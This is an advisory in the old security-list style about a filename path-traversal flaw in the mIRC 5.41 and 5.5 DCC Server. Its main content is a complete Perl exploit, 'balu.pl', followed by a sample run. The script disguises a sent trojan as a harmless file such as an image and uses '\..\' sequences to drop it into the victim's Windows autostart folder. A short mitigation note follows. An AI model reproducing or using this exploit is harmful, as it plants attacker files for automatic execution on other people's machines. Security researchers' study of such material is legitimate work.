COMMAND

    mIRC

SYSTEMS AFFECTED

    Mirc 5.41, 5.5 'DCC Server'

PROBLEM

    Spikeman posted following.  While talking with 'typo' he gave his
    this mIRC bug as it says in the file.  mIRC 5.5's newly introduced
    dcc server feature doesn't filter metachars (such as . and \) from
    sent filenames.  Following script fakes the sending of a  harmless
    file and then puts malicious  file in a wanted destination  dir on
    the same harddrive  (autostart dir is  a good choice).   This file
    could be also obtained from:

        http://spikeman.genocide2600.com/balu.pl

    Exploit follows:

    #!/usr/bin/perl
    # Mirc 5.5 'DCC Server' pathbug(balu) tool. - typo@inferno.tusculum.edu
    #
    # usage: ./balu.pl <hostname> <(any)nick> <file/trojan to send(local)>
    #                  <fake filename(imaginary)> <path+filename (remote)>
    #
    #

    use IO::Socket;

    $host = shift or die 'need a host to connect to.'; chomp $host;
    $nick = shift or die 'need source nick (e.g. satan)'; chomp $nick;
    $file = shift or die 'need a file to send (eg: ./evil.exe).'; chomp $file;
    $ffile = shift or die 'need a fake filename to send (eg: teen5.jpg).'; chomp $ffile;
    $rfile = shift or die 'need remote filename+path, eg(including the \'\'s): \'windows\startm~1\progra~1\autostart\bla.exe\' (which is the path of autostart in german win95)';
    chomp $rfile;
    ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
    $mysock = IO::Socket::INET->new("$host:59") or die "can't connect to $host:59";

    #$mysock->send("100 bla\n");
    defined $mysock -> send("120 $nick $size $ffile" . ' ' x 74 .  '\..\..\..\..\..\\' . $rfile);

    FOO: while (defined $mysock) {
      $mysock->recv($bla,1);
      last FOO if $bla eq "\n";
      $foo .= $bla;
      goto exit if (!defined $mysock);
      goto exit if (!defined $bla);
    }

    ($f1,$f2,$f3) = split(/ /,$foo, 3);
    print "Nick of receiver: $f2 - Resume requested at offset: $f3\n";
    if ($f3 != 0) { print "Error: $f2 wants to resume.. aborting! Try another remote filename.\n"; goto exit; }
    print "sending... ";
    open(FILE,$file);
    while (<FILE>) {
      $mysock->send($_);
    }

    exit:
    print "done.\n";
    $mysock->close;

    Also,

        phear:~$./balu foo.bar.org RedMage ./evilfile.txt breasts.jpg
        'windows\startm~1\programs\startup\evilfile.txt'
        Nick of receiver: RedMage - Resume requested at offset: 0
        sending... done.
        phear:~$

        C:\WINDOWS> dir startm~1\programs\startup\e*.txt

         Volume in drive C is BOOT
         Volume Serial Number is 6396-30DC
         Directory of C:\WINDOWS\Start Menu\Programs\Startup

        EVILFI~1 TXT            22  02-01-99  1:53p evilfile.txt
                 1 file(s)             22 bytes
                 0 dir(s)     246,480,896 bytes free

         C:\WINDOWS>

    Successful on both mIRC 5.5 and mIRC 5.41.

SOLUTION

    This will only  work if you  have the mIRC  DCCSERVER in ON.   The
    best thing to do is just type: '/dccserver off' or be a little bit
    more careful; at least until an other mIRC is released or a better
    patch is provided by someone else.